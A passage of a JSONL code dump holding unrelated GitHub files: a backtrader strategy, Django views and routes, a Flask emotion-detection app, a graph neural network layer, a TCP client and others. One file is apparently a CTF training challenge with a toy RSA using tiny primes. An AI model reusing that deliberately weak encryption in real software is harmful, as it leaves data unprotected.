'NSEI'),\n ('tick_size', 0.0005),\n )\n\n def __init__(self):\n\n self.inds = dict()\n\n for d in self.datas :\n if d._name == self.p.benchmark_name :\n continue\n\n self.inds[d] = dict()\n\n self.inds[d]['newHighCH'] = NEW_HIGH.newHigh(d,subplot=False)\n self.inds[d]['newHigh'] = self.inds[d]['newHighCH'].newHigh\n\n self.inds[d]['newHighStop70CH'] = NEW_HIGH_STOP70.newHighstop70(d,subplot=False)\n self.inds[d]['newHighstop70'] = self.inds[d]['newHighStop70CH'].newHighstop70\n\n self.inds[d]['order'] = None\n\n self.inds[d]['hi'] = d.high\n self.inds[d]['lo'] = d.low\n\n self.inds[d]['eligible'] = False\n\n self.inds[d]['counter'] = 0\n\n self.inds[d]['tradeno'] = 0\n\n self.bar_counter = 0\n\n self.highest_lowest = []\n hi,lo = self.data0.high , self.data0.low\n\n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.data.datetime[0]\n if isinstance(dt, float):\n dt = bt.num2date(dt)\n print('%s, %s' % (dt.isoformat(), txt))\n\n def notify_order(self, order):\n if order.status in [order.Accepted]: #Can add order.Submitted to get that details\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n self.log('ORDER ACCEPTED', dt=order.created.dt)\n self.order = order\n return\n\n if order.status in [order.Expired]:\n self.log('BUY EXPIRED')\n\n elif order.status in [order.Completed]:\n if order.isbuy():\n self.log(\n 'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm))\n\n else: # Sell\n 
self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm))\n\n # Sentinel to None: new orders allowed\n # self.order = None\n\n\n def next(self):\n\n self.bar_counter += 1\n\n for d in self.datas :\n\n if d._name == self.p.benchmark_name :\n continue\n\n # print(self.getposition(data=d).size)\n if self.inds[d]['order']: # check for open orders, if so, then cancel order before issuing new.\n self.cancel(self.inds[d]['order'])\n\n if self.getposition(data=d).size < self.params.trade_size :\n self.inds[d]['order'] = self.buy(data=d,price=self.inds[d]['newHigh'][0],exectype=bt.Order.Stop)\n # print('buy condition met')\n\n if self.getposition(data=d).size > 0 :\n self.inds[d]['counter'] += 1\n self.inds[d]['eligible'] = True\n\n if self.getposition(data=d).size > 0 and d.low[0] < self.inds[d]['newHighstop70'][0]:\n self.inds[d]['order'] = self.close(data=d,price=(d.low[0] * 0.999) ,exectype=bt.Order.Stop)\n # print(\"sell condition met\")\n\n\n if self.getposition(data=d).size == 0 and self.inds[d]['eligible'] :\n self.inds[d]['hi'] = d.high.get(size=self.inds[d]['counter'])\n self.inds[d]['lo'] = d.low.get(size=self.inds[d]['counter'])\n self.inds[d]['eligible'] = False\n # self.highest_lowest.append([self.data.num2date(),max(self.inds[d]['hi']),min(self.inds[d]['lo'])])\n self.inds[d]['tradeno'] += 1\n self.counter = 0\n print('[+] '+d.num2date().strftime(\"%d-%m-%Y\") +' Highest in TradeNo '+ str(self.inds[d]['tradeno']) + ' of ' + str(d._name) +' is := '+ str(max(self.inds[d]['hi'])))\n print('[+] '+d.num2date().strftime(\"%d-%m-%Y\") +' Lowest in TradeNo '+ str(self.inds[d]['tradeno']) + ' of ' + str(d._name) +' is := '+ str(min(self.inds[d]['lo'])))\n\n def candle_lb():\n return 1000","repo_name":"iamclearmind/webAppBackend","sub_path":"spe/strategies/abcd.py","file_name":"abcd.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74998828306","text":"from .models import Producto, Venta\nfrom django.shortcuts import render, redirect\nfrom .forms import ProductoForm, VentaForm\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.core import serializers\nfrom django.http import HttpResponse\nimport json\n# Create your views here.\nfrom django.contrib.auth.decorators import login_required\nimport social_django\n\nfrom django.contrib.auth import logout as log_out\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom urllib.parse import urlencode\n\ndef index(request):\n template='index.html'\n ventas= Venta.objects.all()\n jsondata = serializers.serialize('json',ventas)\n context={\n\t\t'results':ventas,\n\t\t'jsondata':jsondata,\n\t}\n return render(request,template,context)\n\ndef productos(request):\n\ttemplate='Producto/productos.html'\n\tresults=Producto.objects.all()\n\tjsondata = serializers.serialize('json',results)\n\tcontext={\n\t\t'results':results,\n\t\t'jsondata':jsondata,\n\t}\n\treturn render(request,template,context)\n\ndef getdata(request):\n\n ventas= Venta.objects.all()\n jsondata = serializers.serialize('json',ventas)\n return HttpResponse(jsondata)\n\ndef base_layout(request):\n\ttemplate='base.html'\n\treturn render(request,template)\n\ndef ProductoList(request):\n queryset = Producto.objects.all()\n context = {\n 'producto_list': queryset\n }\n return render(request, 
'Producto/productos.html', context)\n\ndef ProductoCreate(request):\n    if request.method == 'POST':\n        form = ProductoForm(request.POST)\n        if form.is_valid():\n            producto = form.save()\n            producto.save()\n            messages.add_message(request, messages.SUCCESS, 'Producto create successful')\n            return HttpResponseRedirect(reverse('productoList'))\n        else:\n            print(form.errors)\n    else:\n        form = ProductoForm()\n\n    context = {\n        'form': form,\n    }\n\n    return render(request, 'Producto/productoCreate.html', context)\n\ndef ProductoUpdate(request,pk):\n    producto= Producto.objects.get(id=pk)\n    if request.method == 'GET':\n        form= ProductoForm(instance=producto)\n    else:\n        form= ProductoForm(request.POST, instance=producto)\n        if form.is_valid():\n            form.save()\n            messages.add_message(request, messages.SUCCESS, 'Producto update successful')\n            return HttpResponseRedirect(reverse('productoList'))\n\n    context = {\n        'form': form,\n    }\n\n    return render(request, 'Producto/productoUpdate.html', context)\n\ndef VentaList(request):\n    queryset = Venta.objects.all()\n    context = {\n        'venta_list': queryset\n    }\n    return render(request, 'Venta/ventas.html', context)\n\ndef VentaCreate(request):\n    if request.method == 'POST':\n        form = VentaForm(request.POST)\n        if form.is_valid():\n            venta = form.save()\n            venta.save()\n            messages.add_message(request, messages.SUCCESS, 'Venta create successful')\n            return HttpResponseRedirect(reverse('ventaCreate'))\n        else:\n            print(form.errors)\n    else:\n        form = VentaForm()\n\n    context = {\n        'form': form,\n    }\n\n    return render(request, 'Venta/ventaCreate.html', context)\n\n\n\n\n@login_required\ndef dashboard(request):\n    user = request.user\n    auth0user = user.social_auth.get(provider='auth0')\n    userdata = {\n        'user_id': auth0user.uid,\n        'name': user.first_name,\n        'picture': auth0user.extra_data['picture']\n    }\n\n    return render(request, 'dashboard.html', {\n        'auth0User': auth0user,\n        'userdata': json.dumps(userdata, indent=4)\n    })\n\ndef logout(request):\n    log_out(request)\n    return_to = urlencode({'returnTo': request.build_absolute_uri('/')})\n    logout_url = 'https://%s/v2/logout?client_id=%s&%s' % \\\n                 (settings.SOCIAL_AUTH_AUTH0_DOMAIN, settings.SOCIAL_AUTH_AUTH0_KEY, return_to)\n    return HttpResponseRedirect(logout_url)\n\ndef getRole(request):\n    import requests  # not imported at module level in this file\n    user = request.user\n    auth0user = user.social_auth.get(provider=\"auth0\")\n    accessToken = auth0user.extra_data['access_token']\n    url = \"https://isis2503-ivan-alfonso.auth0.com/userinfo\"\n    headers = {'authorization': 'Bearer ' + accessToken}\n    resp = requests.get(url, headers=headers)\n    userinfo = resp.json()\n    role= userinfo['https://isis2503-ivan-alfonso:auth0:com/role']\n    return (role)\n","repo_name":"Lala341/ATpost","sub_path":"productos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"35566344571","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport imblearn as imb\nfrom sklearn.preprocessing import OneHotEncoder\n\n### Reading .pkl file\nnum_chr = '1'\npd_df = pd.read_pickle(f\"/mnt/wd/nsap/imp2/chr{num_chr}.pkl\")\nprint('Original DF: ', pd_df, sep='\\n')\n\n## Saving 1st two columns\nclasses = pd_df['PHENOTYPE']\npd_df_out = pd_df[['IID','PHENOTYPE']].copy()\npd_df.drop(['IID','PHENOTYPE'], axis=1, inplace=True)\n\n### One-Hot encode\nprint('Performing one-hot encoding...')\nenc = OneHotEncoder(sparse=False, handle_unknown='error')\nenc.fit(pd_df)\npd_df_enc = 
enc.transform(pd_df)\npd_df_columns = enc.get_feature_names_out()\nprint('Encoded...')\n\n### NearMiss-1 selects the positive samples for which the average distance to the N\n### closest samples of the negative class is the smallest.\nprint('Performing NearMiss undersampling...')\nundersample = imb.under_sampling.NearMiss(sampling_strategy='majority',\n version=1,\n n_neighbors=3, \n n_jobs=12)\npd_df_enc, classes = undersample.fit_resample(pd_df_enc, classes)\ncounter = Counter(classes)\nprint('Classes counter: ', counter)\nresampled_idx = undersample.sample_indices_\npd_df_res = pd.DataFrame(pd_df_enc, columns=pd_df_columns, index=resampled_idx)\n\n# ### Oversampling technique SMOTEN (Synthetic Minority Over-sampling Technique for Nominal)\n# print(f\"Original class counts: {Counter(classes)}\")\n# smoten_over = imb.over_sampling.SMOTEN(n_jobs=6)\n# pd_df_res, classes_res = smoten_over.fit_resample(pd_df_enc, classes)\n# print(f\"Class counts after resampling {Counter(classes_res)}\")\n# print('pd_df_res: ', pd_df_res, sep='\\n')\n\n# ### Save new DF\n# pd_df_out = pd.merge(pd_df_out, pd_df_res, left_index=True, right_index=True)\n# print(pd_df_out)\n# pd_df_out.to_pickle(f\"/mnt/wd/nsap/imp2/chr{num_chr}_nearmiss.pkl\")\n","repo_name":"NSapozhnikov/RandomForest_dbgap","sub_path":"resampling.py","file_name":"resampling.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3524153963","text":"#!/usr/bin/env python3\nfrom urwid import MainLoop, \\\n Padding, \\\n LineBox, \\\n Filler, \\\n Edit, \\\n Text, \\\n Widget, \\\n RELATIVE_100\n\n\nclass InputBox(Filler):\n def __init__(self, banner_txt: str):\n super().__init__(self.__set_body(Edit(banner_txt)), top=0)\n\n\n @property\n def body(self):\n return super().body.original_widget.original_widget\n\n def __set_body(self, widget: Widget):\n self._sizing\n self.original_widget = Padding(LineBox(widget), align='center', left=0, width=RELATIVE_100)\n return self.original_widget\n\n def keypress(self, size, key):\n if(key != 'enter'):\n return super(InputBox, self).keypress(size, key)\n greeting_box = Text(f'Why hello there, {self.body.edit_text}')\n self.__set_body(greeting_box)\n\n\n\ndef cmd_handler(cmd):\n print(cmd)\n\n\ndef main():\n event_loop = MainLoop(InputBox('What\\'s yer name, son?: '))\n\n try:\n event_loop.run()\n except KeyboardInterrupt:\n print('Goodbye!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"oresat/oresat-tpane","sub_path":"examples/urwid_example.py","file_name":"urwid_example.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71097958547","text":"from django.urls import path, include\nfrom .api.views import NoteListCreateAPIView, NoteRetrieveUpdateAPIViewAPIView, GetShareNoteSharedByAPIView, \\\n GetShareNoteWithMeAPIView, CreateSharNoteAPIView, DetailSharedNoteWithAPIView, DetailSharedNoteByAPIView, \\\n TagListViewAPI\n\nurlpatterns = [\n path('sharedwithme/api/v1//', DetailSharedNoteWithAPIView.as_view()),\n path('sharedbyme/api/v1//', DetailSharedNoteByAPIView.as_view()),\n path('api/v1//', NoteRetrieveUpdateAPIViewAPIView.as_view()),\n\n path('api/v1/', NoteListCreateAPIView.as_view()),\n path('share/api/v1/', CreateSharNoteAPIView.as_view()),\n path('sharedbyme/api/v1/', GetShareNoteSharedByAPIView.as_view()),\n path('sharedwithme/api/v1/', GetShareNoteWithMeAPIView.as_view()),\n 
path('tags/api/v1/', TagListViewAPI.as_view()),\n\n\n]\n","repo_name":"ishtiaque2asad2/technotesplus","sub_path":"technoteplus/note/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"73216682704","text":"from flask import Flask, request, send_file, jsonify, render_template, make_response\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nfrom io import BytesIO\nimport cv2\nimport numpy as np\n\napp = Flask(__name__)\n\n# Load the models\nface_classifier = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nclassifier = load_model(\"model.h5\")\nemotion_labels = ['Angry', 'Disgust', 'Fear', 'Happy', 'Neutral', 'Sad', 'Surprise']\n\n@app.route('/')\ndef index():\n    # Serving the frontend HTML (assuming it's named 'index.html' in a 'templates' folder)\n    return render_template('index.html')\n\n@app.route('/detect-emotion', methods=['POST'])\ndef detect_emotion():\n    file = request.files['image']\n    if not file:\n        return jsonify({'error': 'no file uploaded'}), 400\n\n    frame = cv2.imdecode(np.frombuffer(file.read(), dtype=np.uint8), cv2.IMREAD_COLOR)\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    faces = face_classifier.detectMultiScale(gray)\n\n    for (x, y, w, h) in faces:\n        cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 255), 2)\n        roi_gray = gray[y:y+h, x:x+w]\n        roi_gray = cv2.resize(roi_gray, (48, 48), interpolation=cv2.INTER_AREA)\n\n        if np.sum([roi_gray]) != 0:\n            roi = roi_gray.astype('float') / 255.0\n            roi = img_to_array(roi)\n            roi = np.expand_dims(roi, axis=0)\n\n            prediction = classifier.predict(roi)[0]\n            label = emotion_labels[prediction.argmax()]\n\n            label_position = (x, y)\n            cv2.putText(frame, label, label_position, cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\n\n    _, buffer = cv2.imencode('.png', frame)\n    response = make_response(buffer.tobytes())\n    response.headers['Content-Type'] = 'image/png'\n    return response\n\n\n\n    # return send_file(response, mimetype='image/png')\n\nif __name__ == \"__main__\":\n    app.run(debug=True)\n","repo_name":"NitinsaiAvirneni/Face_Detection_Using_CNN_Via_Flask_API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"14524188101","text":"import random\r\ndef gcd(a,b): # extended Euclidean algorithm (only the gcd is used)\r\n    x, lasty=0,0\r\n    y, lastx=1,1\r\n    n=a\r\n    m=b\r\n    while m!=0:\r\n        q=n//m\r\n        r=n%m\r\n        n=m\r\n        m=r\r\n        x, lastx = lastx-q*x, x\r\n        y, lasty = lasty-q*y, y\r\n    return n\r\n\r\ndef gcdost(a,b): # extended Euclidean algorithm (returns the Bezout coefficient of a)\r\n    x, lasty=0,0\r\n    y, lastx=1,1\r\n    n=a\r\n    m=b\r\n    while m!=0:\r\n        q=n//m\r\n        r=n%m\r\n        n=m\r\n        m=r\r\n        x, lastx = lastx-q*x, x\r\n        y, lasty = lasty-q*y, y\r\n    return lastx\r\n\r\ndef pmnoj(a):\r\n    p = []\r\n    d = 2\r\n    while d * d <= a:\r\n        if a % d == 0:\r\n            p.append(d)\r\n            a //= d\r\n        else:\r\n            d += 1\r\n    if a > 1:\r\n        p.append(a)\r\n    return p\r\n\r\ndef ferma(c):\r\n    # Fermat primality test: every random base must satisfy a**(c-1) == 1 (mod c);\r\n    # the original returned after the first draw, so only one base was ever tested.\r\n    for i in range(1000):\r\n        a=random.randint(2, c-2)\r\n        b=a**(c-1)%c\r\n        if b!=1:\r\n            return False\r\n    return True\r\n\r\ndef rsa(st1, p,q):\r\n    st2=[]\r\n    res=[]\r\n    res2=[]\r\n    p1=ferma(p)\r\n    q1=ferma(q)\r\n    if not p1 or not q1:\r\n        return \"Error\"\r\n    for i in range(len(st1)):\r\n        for j in range(len(alf)):\r\n            if st1[i]==alf[j]:\r\n                st2.append(zam[j])\r\n    n=p*q\r\n    fn=(p-1)*(q-1)\r\n    i=2\r\n    while i < fn:\r\n        e=gcd(fn,i)\r\n        if e==1:\r\n            e=i\r\n            break\r\n        i+=1\r\n    
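# d is the modular inverse of e modulo fn, produced by the extended Euclidean\r\n    # routine above; the check below shifts it into [0, fn) before it is used as\r\n    # the private exponent.\r\n    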
d=gcdost(e,fn)\r\n if d<0:\r\n d+=fn\r\n for i in st2:\r\n res.append((i**e)%n)\r\n for i in res:\r\n res2.append((i**d)%n)\r\n return res,res2\r\n\r\n\r\nalf=[\"а\",\"б\",\"в\",\"г\",\"д\",\"е\",\"ё\",\"ж\",\"з\",\"и\",\"й\",\"к\",\"л\",\"м\",\"н\",\"о\",\"п\",\"р\",\"с\",\"т\",\"у\",\"ф\",\"х\",\"ц\",\"ч\",\"ш\",\"щ\",\"ъ\",\"ы\",\"ь\",\"э\",\"ю\",\"я\",\".\",\",\",\":\",\"?\"]\r\nzam=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36]\r\np=17\r\nq=11\r\nfile=open('text.txt',encoding='utf-8')\r\nst1=list(file.read())\r\nfile.close()\r\nprint(st1)\r\nf,f2=rsa(st1,p,q)\r\ns=sum(f)\r\nprint(s)\r\nprint(f,f2)\r\n\r\n","repo_name":"0awawa0/DonNU_CTF","sub_path":"2021_2022/Training_2/RSA_Dream/Cripto_9.py","file_name":"Cripto_9.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39951442629","text":"#using socket\nfrom socket import *\n\n#setting ip as localhost and port number\nserverName=\"localhost\"\nserverPort=1234\n\n#socket setting with ipv4 and tcp protocol\nclientSocket=socket(AF_INET,SOCK_STREAM)\n#connect to server using connect function\nclientSocket.connect((serverName,serverPort))\n\n#sending a GET request to the server\nrequest = 'GET /requestedFile.html HTTP/1.1\\r\\n\\r\\n'\nclientSocket.send(request.encode())\nanswer=clientSocket.recv(2048)\nprint(answer.decode())\n\n#get requestedfile\nanswer1=clientSocket.recv(2048)\nanswer2=clientSocket.recv(2048)\nanswer3=clientSocket.recv(2048)\n\n#print the return\nprint(answer1.decode())\nprint(answer2.decode())\nprint(answer3.decode())\n\n#socket close\nclientSocket.close()","repo_name":"hoonsw/mycodes","sub_path":"Undergraduate/Network/HW2-2014310375/TCPclient3.py","file_name":"TCPclient3.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17805503984","text":"# @Time : 2021/4/9 11:09\r\n# @Author : Scewiner, Xu, Mingzhou\r\n# @File: Grapg_layer.py.py\r\n# @Software: PyCharm\r\n# from dgl.nn.pytorch import HeteroGraphConv\r\nimport torch\r\nimport torch.nn as nn\r\nimport fairseq.utils as utils\r\nfrom fairseq.modules import LayerNorm\r\nimport torch.nn.functional as F\r\nfrom .GraphDense import GCNLayer,GATLayer\r\n\r\n\r\n\r\n\r\nclass GraphLayer(nn.Module):\r\n def __init__(self, args):\r\n super(GraphLayer, self).__init__()\r\n self.drop = getattr(args, 'gcn_drop', 0.2)\r\n self.hidden_size = args.encoder_embed_dim\r\n self.num_head = args.encoder_attention_heads\r\n self.num_layers = args.ctx_layer\r\n self.activation_fn = utils.get_activation_fn(activation='tanh')\r\n self.activation_relu = utils.get_activation_fn(activation='relu')\r\n self.layers = nn.ModuleList([])\r\n self.layers.extend([\r\n self.build_layer('GCN') for _ in range(self.num_layers)\r\n ])\r\n self.GAT = self.build_layer('GAT')\r\n\r\n def build_layer(self, layer_type='GCN'):\r\n if layer_type == 'GCN':\r\n m = GCNLayer(self.hidden_size, self.hidden_size)\r\n elif layer_type == \"GAT\":\r\n m = GATLayer(self.hidden_size, self.hidden_size)\r\n else:\r\n raise NotImplementedError\r\n return m\r\n\r\n\r\n def forward(self, g_reps, graph, edge_type='forward'):\r\n residual = g_reps\r\n g = graph[0]\r\n if edge_type == 'backward':\r\n g = g.transpose(0,1)\r\n# g = g.to_dense()\r\n\r\n for layer in self.layers:\r\n g_reps = layer(g_reps,g)\r\n g_reps = self.activation_fn(g_reps)\r\n g_reps = F.dropout(g_reps, 
p=self.drop)\r\n g_reps = g_reps + residual\r\n g = graph[-1]\r\n# g = graph[1].to_dense()\r\n # g = g.allow_zero_in_degree=True\r\n # making sentence representation\r\n output = self.GAT(g_reps,g)\r\n output = self.activation_relu(output)\r\n return output\r\n\r\n\r\n\r\nclass GraphEncoders(nn.Module):\r\n def __init__(self, args):\r\n super(GraphEncoders, self).__init__()\r\n self.shared_layers = getattr(args, \"shared_layers\", False)\r\n if self.shared_layers:\r\n self.layers = GraphLayer(args)\r\n else:\r\n self.layers = nn.ModuleList([])\r\n self.layers.extend([\r\n GraphLayer(args) for _ in range(2)\r\n ])\r\n self.ln_layers = nn.ModuleList([])\r\n self.ln_layers.extend([LayerNorm(args.encoder_embed_dim) for _ in range(2)])\r\n self.final_layer_ln = LayerNorm(args.encoder_embed_dim)\r\n self.edge_type = ['forward', 'backward']\r\n self.gate_units = GateUnit(args.encoder_embed_dim)\r\n self.drop = getattr(args, 'gcn_drop', 0.2)\r\n\r\n def forward(self, g_reps, graph):\r\n residual = g_reps\r\n output = []\r\n if self.shared_layers:\r\n for i in range(2):\r\n if i == 0:\r\n x = self.ln_layers[i](g_reps)\r\n else:\r\n x = self.ln_layers[i](residual)\r\n x = F.dropout(x, p=self.drop, training=self.training)\r\n edge_type = self.edge_type[i]\r\n x = self.layers(x, graph, edge_type)\r\n x = F.dropout(x, p=self.drop, training=self.training)\r\n output.append(x)\r\n else:\r\n for edge_type, ln_layer, layer in zip(self.edge_type, self.ln_layers, self.layers):\r\n x = ln_layer(g_reps) if edge_type == 'forward' else ln_layer(residual)\r\n x = F.dropout(x, self.drop, training=self.training)\r\n x = layer(x, graph, edge_type)\r\n x = F.dropout(x, p=0.1, training=self.training)\r\n output.append(x)\r\n output = self.gate_units(*output)\r\n output = self.final_layer_ln(output)\r\n return output\r\n\r\n\r\n\r\ndef build_linear(in_feat, out_feat, bias=True):\r\n m = nn.Linear(in_feat, out_feat, bias=bias)\r\n nn.init.xavier_uniform_(m.weight)\r\n if bias:\r\n nn.init.constant_(m.bias, 0)\r\n return m\r\n\r\n\r\nclass GateUnit(nn.Module):\r\n def __init__(self, hidden_size):\r\n super(GateUnit, self).__init__()\r\n self.x_weight = build_linear(hidden_size, hidden_size)\r\n self.y_weight = build_linear(hidden_size, hidden_size)\r\n\r\n def forward(self, x, y):\r\n gate = torch.sigmoid(self.x_weight(x) + self.y_weight(y))\r\n return gate * x + (1 - gate) * y\r\n","repo_name":"scewiner/DocGraph","sub_path":"GraphLayer.py","file_name":"GraphLayer.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38360937088","text":"# MOTOR CONTROL\n\nshutdown=['SHUTDOWN','SHUT']\nmov=['MOVE','MOTORS','LOCOMOTION','MOVING']\nfwd=['FORWARD','STRAIGHT','F']\nbak=['BACKWARD','BACK','B']\nrit=['RIGHT','R']\nlft=['LEFT','L']\nstp=['S','STOP','BRAKE','BRAKES']\n\nmovement_access= mov+fwd+bak+rit+lft # To know if the user is requesting movement .\n\n#==============================================================================================\n\ngreet=['HI','HELLO','AFTERNOON','MORNING']\naffirmation = ['YES','YEP','YEAH','Y','SURE']\nnegation = ['NO','NOPE','NAH','N','NEVER','LATER']\nhpy=['GOOD','COOL','AMAZING','AWESOME']\n\n\n\n\n\n\n","repo_name":"2602GS1999/REFORESTATION-ROVER-CONTROLED-OVER-VNC-DIRECTLY","sub_path":"INPUT.py","file_name":"INPUT.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"4073452019","text":"import ast\nimport json\nimport logging\n\nimport django\nimport itertools\nimport operator\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.db.models.base import ModelState\nfrom django.db.models.fields.related import ReverseSingleRelatedObjectDescriptor, ForeignObjectRel\nfrom django.db.models.query import QuerySet\nfrom django.core import exceptions\nfrom django.db.models.fields import Field\nfrom django.utils.functional import cached_property\n\nlogger = logging.getLogger(__name__)\n\n\nclass NoDbQuery(object):\n def __init__(self, q=None, ordering=None):\n self._q = q\n self._ordering = [] if ordering is None else ordering\n\n def can_filter(self):\n return True\n\n def add_q(self, q):\n self._q = q if self._q is None else self._q & q\n\n def clone(self):\n tmp = NoDbQuery()\n tmp._q = self._q.clone() if self._q is not None else None\n tmp._ordering = self._ordering[:]\n return tmp\n\n def clear_ordering(self, force_empty=None):\n self._ordering = []\n\n def add_ordering(self, *keys):\n self._ordering += keys\n\n @property\n def ordering(self):\n return self._ordering\n\n @property\n def q(self):\n \"\"\":rtype: Q\"\"\"\n return self._q\n\n def set_empty(self):\n self.clear_ordering()\n self._q = None\n\n def __str__(self):\n return \"\".format(self._q, self._ordering)\n\n\nclass NodbQuerySet(QuerySet):\n\n def __init__(self, model=None, using=None, hints=None, request=None, context=None):\n \"\"\"\n model parameter needs to be optional, as QuerySet.__deepcopy__() sets self.model afterwards.\n \"\"\"\n self.model = model\n self._context = context\n self._current = 0\n self._query = NoDbQuery()\n self._result_cache = None\n self._prefetch_related_lookups = False\n\n @cached_property\n def _max(self):\n return len(self._filtered_data) - 1\n\n def _data(self):\n context = self._context if self._context else NodbManager.nodb_context\n objects = self.model.get_all_objects(context, query=self._query)\n self_pointer = LazyProperty.QuerySetPointer(objects)\n for obj in objects:\n # Because we're calling the model constructors ourselves, django thinks that\n # the objects are not in the database. 
We need to \"hack\" this.\n obj._state.adding = False\n obj._query_set_pointer = self_pointer\n\n return objects\n\n @cached_property\n def _filtered_data(self):\n \"\"\"\n Each Q child consists of either another Q, `attr__iexact` or `model__attr__iexact` or `attr`\n \"\"\"\n def _filter_by_modifier(keys, attr, value):\n modifier = keys[1] if len(keys) > 1 else \"exact\"\n if modifier == \"exact\":\n return attr == attr.__class__(value)\n elif modifier == \"istartswith\":\n return attr.startswith(value)\n elif modifier == \"icontains\":\n return value in attr\n elif modifier == \"in\":\n return attr in value\n else:\n raise ValueError('Unsupported Modifier {}.'.format(modifier))\n\n def filter_impl(keys, value, obj):\n assert keys\n\n if isinstance(obj, dict):\n if keys[0] not in obj:\n raise AttributeError(\n 'Attribute {} does not exist in dict'.format(keys[0]))\n elif not hasattr(obj, keys[0]):\n raise AttributeError(\n 'Attribute {} does not exist for {}'.format(keys[0], obj.__class__))\n\n attr = obj[keys[0]] if isinstance(obj, dict) else getattr(obj, keys[0], None)\n\n if attr is None:\n return value is None\n elif isinstance(attr, list):\n if isinstance(attr[0], basestring):\n return _filter_by_modifier(keys, attr, value)\n return reduce(operator.or_, [filter_impl(keys[1:], value, e) for e in attr], False)\n elif isinstance(attr, models.Model) or isinstance(attr, dict):\n return filter_impl(keys[1:], value, attr)\n else:\n return _filter_by_modifier(keys, attr, value)\n\n def filter_one_q(q, obj):\n \"\"\"\n :type q: Q\n :type obj: NodbModel\n :rtype: bool\n \"\"\"\n def negate(res):\n return not res if q.negated else res\n\n if q is None:\n return True\n elif isinstance(q, tuple):\n return filter_impl(q[0].split('__'), q[1], obj)\n elif q.connector == \"AND\":\n return negate(reduce(lambda l, r: l and filter_one_q(r, obj), q.children, True))\n else:\n children = {c for c in q.children if not isinstance(c, Q) or c.children}\n return negate(reduce(lambda l, r: l or filter_one_q(r, obj), children, False))\n\n filtered = [obj for obj in self._data()\n if filter_one_q(self._query.q, obj)]\n\n for order_key in self.query.ordering[::-1]:\n if order_key.startswith(\"-\"):\n order_key = order_key[1:]\n filtered.sort(key=lambda obj: getattr(obj, order_key), reverse=True)\n else:\n filtered.sort(key=lambda obj: getattr(obj, order_key))\n\n return filtered\n\n def __iter__(self):\n self._current = 0\n return self\n\n def __len__(self):\n return len(self._filtered_data)\n\n def next(self):\n if self._current > self._max:\n raise StopIteration\n else:\n self._current += 1\n return self._filtered_data[self._current - 1]\n\n def __getitem__(self, index):\n return self._filtered_data[index]\n\n def _clone(self, klass=None, setup=False, **kwargs):\n my_clone = NodbQuerySet(self.model, context=self._context)\n my_clone._query = self._query.clone()\n return my_clone\n\n def __deepcopy__(self, memo):\n return super(NodbQuerySet, self).__deepcopy__(memo)\n\n def count(self):\n return len(self._filtered_data)\n\n def get(self, **kwargs):\n \"\"\"Return a single object filtered by kwargs.\"\"\"\n filtered_data = self.filter(**kwargs)\n\n # Thankfully copied from\n # https://github.com/django/django/blob/1.7/django/db/models/query.py#L351\n num = len(filtered_data)\n if num == 1:\n return filtered_data[0]\n if not num:\n raise self.model.DoesNotExist(\n '{} matching query \"{}\" does not exist.'.format(self.model._meta.object_name,\n filtered_data.query))\n raise self.model.MultipleObjectsReturned(\n 
